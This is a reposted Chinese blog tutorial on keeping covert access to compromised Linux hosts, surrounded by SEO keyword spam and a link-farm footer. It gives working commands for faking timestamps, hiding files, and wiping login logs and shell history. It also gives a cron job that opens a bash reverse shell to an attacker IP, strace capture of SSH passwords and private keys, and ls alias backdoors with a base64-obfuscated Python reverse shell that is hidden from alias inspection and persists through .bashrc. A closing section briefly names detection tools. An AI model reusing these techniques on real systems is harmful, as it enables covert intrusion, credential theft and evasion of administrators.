网站建设与管理自考试题及答案,比较好的网站建设平台,英文官网建设,重庆汉沙科技做网站怎么样Linux权限维持—Strace监控Alias别名Cron定时任务 1. 前言2. 隐藏手法2.1. 时间伪造2.1.1. 修改时间 2.2. 隐藏文件2.3. chattr命令2.3.1. 命令参考2.3.2. 属性添加2.3.3. 属性解除 2.4. 历史命令2.4.1. 隐藏命令 2.5. 清除登录日志2.5.1. 清除登录成功日志2.5.2. 清… Linux权限维持—Strace监控Alias别名Cron定时任务 1. 前言2. 隐藏手法2.1. 时间伪造2.1.1. 修改时间 2.2. 隐藏文件2.3. chattr命令2.3.1. 命令参考2.3.2. 属性添加2.3.3. 属性解除 2.4. 历史命令2.4.1. 隐藏命令 2.5. 清除登录日志2.5.1. 清除登录成功日志2.5.2. 清除登录失败日志 3. 定时任务—cron后门3.1. 编辑后门反弹3.2. 添加定时任务3.3. 查看反弹效果3.4. 查看流量 4. 监控功能—strace后门4.1. 记录sshd明文4.2. 记录sshd私钥4.3. 问题 5. 命令自定义-Alias后门5.1. 基础演示5.2. 基础反弹5.2.1. 查看效果5.2.2. 问题 5.3. 高级版反弹5.3.1. 执行命令5.3.2. 查看效果5.3.3. 问题 5.4. 持久化5.4.1. 修改文件5.4.2. 查看效果 6. 内核加载LKM-Rootkit后门7. Linux检测工具 1. 前言 在上篇文章中介绍了几种权限维持的方式感觉很多手法都是能够被发现的或者很明显的比如文件的落地时间通常在运维人员在看见新文件的时候都会去看看文件里面写的是什么是谁建立的如果运维人员就一个那么肯定被查的概率更高。 所以有时候需要适当的隐藏自己留的后门。
2. 隐藏手法 这里主要就讲述一些常见的隐藏手法只要隐藏的深那运维人员就不易发现那么权限维持的时间就长。
2.1. 时间伪造 提前创建了一个1.txt的文件我们查看一下1.txt的时间可以明显发现格格不入如果是运维人员看见那么一定会去排查这个问题那么如果这个是木马文件那么就直接被发现了。
ls -l2.1.1. 修改时间 这里我们就将时间修改一下和公共的文件夹时间一样这里修改完就可以实现对时间的伪造。
touch -r 目标时间戳的文件 要修改时间戳的文件 2.2. 隐藏文件 隐藏文件主要就是靠运维人员日常排查的相关来进行权限维持的在Linux系统文件前面添加一个.就可以实现文件的隐藏而如果运维人员在排查的时候仅仅使用ls那么是很难排查到隐藏文件的。 可以看到直接使用ls是无法查看到1.txt文件的必须使用ls -la来进行排查。
touch .1.txt2.3. chattr命令 这个命令在Linux系统中是用于锁定一些重要文件避免被删除而我们就可以利用这个命令进行伪造来避免文件被删除同时也能够在一定情况下忽悠运维人员以为是系统文件从而不去删除。
2.3.1. 命令参考
chattr 参数 文件名
a让文件或目录仅供附加用途。
b不更新文件或目录的最后存取时间。
c将文件或目录压缩后存放。
d将文件或目录排除在倾倒操作之外。
i不得任意更动文件或目录。
s保密性删除文件或目录。
S即时更新文件或目录。
u预防意外删除。2.3.2. 属性添加 这里是要i不是-i相当于是给文件添加上属性。
chattr i 1.txt 2.3.3. 属性解除 这里只要将前面的i修改成-i即可接触属性。
chattr -i 1.txt2.4. 历史命令 history命令是能够查询到命令执行历史的而在我们执行木马运行命令后如果不删除这些命令就会出现被排查的情况那么这时候就需要将命令隐藏也就是不记录。 2.4.1. 隐藏命令 其实在执行命令的时候在命令前面添加一个空格那么这个命令执行就不会记录到历史记录中这个技巧如果在你的系统不管用请查看下环境变量 HISTCONTROL 是否包含 ignorespace貌似 centos 系统默认没有设置这个值。
history -c ##清除缓存
echo ./.bash_history #彻底删除命令这里我就不演示了主要是在Linux中不知道为什么这些命令参数都无法执行。
2.5. 清除登录日志 这里将这些日志清除就可以避免被发现登录的IP地址等信息。
2.5.1. 清除登录成功日志
echo /var/log/wtmp ##此文件默认打开时乱码可查到ip等信息
last|grep root ##此时即查不到用户登录信息2.5.2. 清除登录失败日志
echo /var/log/btmp ##此文件默认打开时乱码可查到登陆失败信息
lastb |grep root ##查不到登陆失败信息3. 定时任务—cron后门 cron后门主要就是利用系统的定时任务功能实现反弹shell。
3.1. 编辑后门反弹 这里创建一个隐藏文件然后在隐藏文件中添加反弹shell的地址及端口在给脚本添加一个执行权限。
vim /etc/.backshell.sh#!/bin/bash
bash -i /dev/tcp/192.168.10.10/4444 01chmod x /etc/.backshell.sh3.2. 添加定时任务 设定每分钟自动执行该脚本。
vim /etc/crontab
*/1 * * * * root /etc/.backshell.sh3.3. 查看反弹效果 在攻击机上监听本地的4444端口来等待反弹shell执行。
nc -lvvp 44443.4. 查看流量 这里我们可以去目标主机上查看一下端口连接情况可以看到是存在4444端口的连接的。
netstat -ant4. 监控功能—strace后门 strace是个功能强大的Linux调试分析诊断工具可用于跟踪程序执行时进程系统调用(system call)和所接收的信号尤其是针对源码不可读或源码无法再编译的程序。在Linux系统中用户进程不能直接访问计算机硬件设备。当进程需要访问硬件设备(如读取磁盘文件或接收网络数据等)时必须由用户态模式切换至内核态模式通过系统调用访问硬件设备。strace可跟踪进程产生的系统调用包括参数、返回值和执行所消耗的时间。若strace没有任何输出并不代表此时进程发生阻塞也可能程序进程正在执行某些不需要与系统其它部分发生通信的事情。strace从内核接收信息且无需以任何特殊方式来构建内核。 而且strace可以当作一个键盘记录的后门。
4.1. 记录sshd明文 这里首先记录密码等待用户下次使用ssh进行连接连接后就会在你设置的这个目录中存储明文密码。
(strace -f -F -p ps aux|grep sshd -D|grep -v grep|awk {print $2} -t -e traceread,write -s 32 2 /tmp/.sshd.log ) ##记录ssh登录密码存储到/tmp/.sshd.log文件中。grep -E read\(6, .\\0\\0\\0\\. /tmp/.sshd.log ##查看这个文件。这里使用筛选来查找就是为了更加的方面查找到密码否则可以去看看该文件中登录一次的内容都很多靠肉眼很难查找到。
4.2. 记录sshd私钥
(strace -f -F -p ps aux|grep sshd -D|grep -v grep|awk {print $2} -t -e traceread,write -s 4096 2 /tmp/.sshd.log ) ##这里也是同样的记录私钥到该文件中。grep ‘PRIVATE KEY’ /tmp/.sshd.log ##读取私钥。4.3. 问题 这个命令文件存在一个很大的问题就是会一直记录登陆的字节流可以去查看一下文件这个文件会越来越大所以如果真实环境下还是少用该方式吧避免由于文件占用过大导致硬盘报警从而被发现。
ls -al /tmp/.sshd.log5. 命令自定义-Alias后门 alias在Linux中主要是用于设置命令的别名比如当你设置ls等于ls -al的时候就可以使用alias来实现。
5.1. 基础演示 可以看到原先的ls只是显示一些基础内容而设置别名后就会出现ls -al的执行效果。
alias lsls -al ##设置别名
unalias ls ##删除别名5.2. 基础反弹 这里修改一下反弹的shell地址与端口同时等待运维人员输入ls命令即可。
#将ls设置为反弹shell
alias lsalerts(){ ls $* --colorauto;bash -i /dev/tcp/192.168.10.10/4444 01; };alerts5.2.1. 查看效果 可以看到这里是成功反弹了。
nc -lvvp 44445.2.2. 问题 这里执行ls后会成功执行命令但是存在一个很大的问题就是ls命令会卡死无法操作只有攻击者将会话结束才能够恢复。
5.3. 高级版反弹 这里其实就是调用python的模块来执行利用socket反弹一个shell同时这里是使用bash64进行加密了届时修改的时候可以将该密文中的IP地址及端口修改为自己的即可。
alias lsalerts(){ ls $* --colorauto;python3 -c import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,\UTF-8\)}[sys.version_info[0]](\aW1wb3J0IG9zLHNvY2tldCxzdWJwcm9jZXNzOwpyZXQgPSBvcy5mb3JrKCkKaWYgcmV0ID4gMDoKICAgIGV4aXQoKQplbHNlOgogICAgdHJ5OgogICAgICAgIHMgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pCiAgICAgICAgcy5jb25uZWN0KCgiMTkyLjE2OC4xMC4xMCIsIDQ0NDQpKQogICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSwgMCkKICAgICAgICBvcy5kdXAyKHMuZmlsZW5vKCksIDEpCiAgICAgICAgb3MuZHVwMihzLmZpbGVubygpLCAyKQogICAgICAgIHAgPSBzdWJwcm9jZXNzLmNhbGwoWyIvYmluL3NoIiwgIi1pIl0pCiAgICBleGNlcHQgRXhjZXB0aW9uIGFzIGU6CiAgICAgICAgZXhpdCgp\)));};alerts5.3.1. 执行命令 这里将命令别名绑定到ls命令上这里可能会有一点小问题就是有些系统上并没有安装python3所以我也不测试了。 5.3.2. 查看效果 可以看到确实是反弹过来了不过是使用的是python并没有指定python3所以这里反弹回来后并不能执行命令。
nc -lvvp 44445.3.3. 问题 这里最终的问题就是存在一个python版本问题同时如果运维人员设定过ls命令的别名那么你一修改那么一定会被发现同时该手法在重启后就不再生效了。
5.4. 持久化 这里就是保证系统在重启后依旧能够生效。
5.4.1. 修改文件
vim /etc/upload #将下面的三个后门命令写入
alias lsalerts(){ ls $* --colorauto;python -c import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,\UTF-8\)}[sys.version_info[0]](\aW1wb3J0IG9zLHNvY2tldCxzdWJwcm9jZXNzOwpyZXQgPSBvcy5mb3JrKCkKaWYgcmV0ID4gMDoKICAgIGV4aXQoKQplbHNlOgogICAgdHJ5OgogICAgICAgIHMgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pCiAgICAgICAgcy5jb25uZWN0KCgiMTkyLjE2OC4xMC4xMCIsIDQ0NDQpKQogICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSwgMCkKICAgICAgICBvcy5kdXAyKHMuZmlsZW5vKCksIDEpCiAgICAgICAgb3MuZHVwMihzLmZpbGVubygpLCAyKQogICAgICAgIHAgPSBzdWJwcm9jZXNzLmNhbGwoWyIvYmluL3NoIiwgIi1pIl0pCiAgICBleGNlcHQgRXhjZXB0aW9uIGFzIGU6CiAgICAgICAgZXhpdCgp\)));};alertsalias unaliasalerts(){ if [ $# ! 0 ]; then if [ $* ! ls ][ $* ! alias ][ $* ! unalias ]; then unalias $*;else echo -bash: unalias: ${*}: not found;fi;else echo unalias: usage: unalias [-a] name [name ...];fi;};alertsalias aliasalerts(){ alias $ | grep -v unalias | sed s/alerts.*lambda.*/ls --colorauto\/;};alertsvim ~/.bashrc
#在最后面写入
if [ -f /etc/upload ]; then. /etc/upload
fi5.4.2. 查看效果 没成功。
nc -lvvp 44446. 内核加载LKM-Rootkit后门 正常情况下Linux的后门多数都是使用msf来建立连接但是这些连接都会被运维人员发现所以我们想有一个非tcp连接、流量不容易被怀疑的后门并且在大量的shell的场景下可以管shellReptile刚好是种LKM rootkit因此具有很好的隐藏性和强大的功能。 reptile 使用参考 关于这个起初我是准备写的但是我发现那么多服务器的内核版本都不符合这个工具的测试的范围本地镜像我也懒得找了同时可以去看看其他作者写的方法还有这个工具在2020年的时候停更了。估计也用户了多久了。
7. Linux检测工具 本程序旨在为安全应急响应人员对Linux主机排查时提供便利实现主机侧Checklist的自动全面化检测根据检测结果自动数据聚合进行黑客攻击路径溯源。 linux平台下chkrootkit、rkhunter、OSSEC、zeppoo等 Windows平台下BlackLight、RootkitRevealer、Rootkit Hook Analyzer GScan 文章转载自: http://www.morning.xwlmr.cn.gov.cn.xwlmr.cn http://www.morning.qsyyp.cn.gov.cn.qsyyp.cn http://www.morning.qmwzz.cn.gov.cn.qmwzz.cn http://www.morning.cbndj.cn.gov.cn.cbndj.cn http://www.morning.ltxgk.cn.gov.cn.ltxgk.cn http://www.morning.nypgb.cn.gov.cn.nypgb.cn http://www.morning.jfmjq.cn.gov.cn.jfmjq.cn http://www.morning.gmnmh.cn.gov.cn.gmnmh.cn http://www.morning.rbnnq.cn.gov.cn.rbnnq.cn http://www.morning.xjpnq.cn.gov.cn.xjpnq.cn http://www.morning.skscy.cn.gov.cn.skscy.cn http://www.morning.bqxxq.cn.gov.cn.bqxxq.cn http://www.morning.qgmbx.cn.gov.cn.qgmbx.cn http://www.morning.tlnbg.cn.gov.cn.tlnbg.cn http://www.morning.yrqb.cn.gov.cn.yrqb.cn http://www.morning.jpbpc.cn.gov.cn.jpbpc.cn http://www.morning.xnpml.cn.gov.cn.xnpml.cn http://www.morning.lbcbq.cn.gov.cn.lbcbq.cn http://www.morning.monstercide.com.gov.cn.monstercide.com http://www.morning.bmfqg.cn.gov.cn.bmfqg.cn http://www.morning.nrmyj.cn.gov.cn.nrmyj.cn http://www.morning.mbmtz.cn.gov.cn.mbmtz.cn http://www.morning.yhywx.cn.gov.cn.yhywx.cn http://www.morning.qsfys.cn.gov.cn.qsfys.cn http://www.morning.tntbs.cn.gov.cn.tntbs.cn http://www.morning.ttaes.cn.gov.cn.ttaes.cn http://www.morning.ttaes.cn.gov.cn.ttaes.cn http://www.morning.pwwjs.cn.gov.cn.pwwjs.cn http://www.morning.rkjb.cn.gov.cn.rkjb.cn http://www.morning.jxcwn.cn.gov.cn.jxcwn.cn http://www.morning.yltnl.cn.gov.cn.yltnl.cn http://www.morning.hqgkx.cn.gov.cn.hqgkx.cn http://www.morning.cwgn.cn.gov.cn.cwgn.cn http://www.morning.gwdkg.cn.gov.cn.gwdkg.cn http://www.morning.bpwdc.cn.gov.cn.bpwdc.cn http://www.morning.nckjk.cn.gov.cn.nckjk.cn http://www.morning.gnwpg.cn.gov.cn.gnwpg.cn http://www.morning.xlyt.cn.gov.cn.xlyt.cn http://www.morning.rnfwx.cn.gov.cn.rnfwx.cn http://www.morning.pxrfm.cn.gov.cn.pxrfm.cn http://www.morning.fdxhk.cn.gov.cn.fdxhk.cn http://www.morning.kyflr.cn.gov.cn.kyflr.cn http://www.morning.wwkdh.cn.gov.cn.wwkdh.cn http://www.morning.rzjfn.cn.gov.cn.rzjfn.cn http://www.morning.qbwyd.cn.gov.cn.qbwyd.cn http://www.morning.btqqh.cn.gov.cn.btqqh.cn http://www.morning.tbcfj.cn.gov.cn.tbcfj.cn http://www.morning.stprd.cn.gov.cn.stprd.cn http://www.morning.yzzfl.cn.gov.cn.yzzfl.cn http://www.morning.tqldj.cn.gov.cn.tqldj.cn http://www.morning.cknrs.cn.gov.cn.cknrs.cn http://www.morning.rahllp.com.gov.cn.rahllp.com http://www.morning.drkk.cn.gov.cn.drkk.cn http://www.morning.kzpxc.cn.gov.cn.kzpxc.cn http://www.morning.lbcfj.cn.gov.cn.lbcfj.cn http://www.morning.ryywf.cn.gov.cn.ryywf.cn http://www.morning.nssjy.cn.gov.cn.nssjy.cn http://www.morning.xsctd.cn.gov.cn.xsctd.cn http://www.morning.hfytgp.cn.gov.cn.hfytgp.cn http://www.morning.ryxgk.cn.gov.cn.ryxgk.cn http://www.morning.rhkmn.cn.gov.cn.rhkmn.cn http://www.morning.lthgy.cn.gov.cn.lthgy.cn http://www.morning.cdrzw.cn.gov.cn.cdrzw.cn http://www.morning.fldrg.cn.gov.cn.fldrg.cn http://www.morning.zstbc.cn.gov.cn.zstbc.cn http://www.morning.dtpqw.cn.gov.cn.dtpqw.cn http://www.morning.zlhzd.cn.gov.cn.zlhzd.cn http://www.morning.nlrxh.cn.gov.cn.nlrxh.cn http://www.morning.lgnz.cn.gov.cn.lgnz.cn http://www.morning.ynrzf.cn.gov.cn.ynrzf.cn http://www.morning.gczqt.cn.gov.cn.gczqt.cn http://www.morning.dmkhd.cn.gov.cn.dmkhd.cn http://www.morning.fhntj.cn.gov.cn.fhntj.cn http://www.morning.vehna.com.gov.cn.vehna.com http://www.morning.jkcpl.cn.gov.cn.jkcpl.cn http://www.morning.wmdqc.com.gov.cn.wmdqc.com http://www.morning.qtzk.cn.gov.cn.qtzk.cn http://www.morning.pbzgj.cn.gov.cn.pbzgj.cn http://www.morning.zkqjz.cn.gov.cn.zkqjz.cn http://www.morning.jgcyn.cn.gov.cn.jgcyn.cn
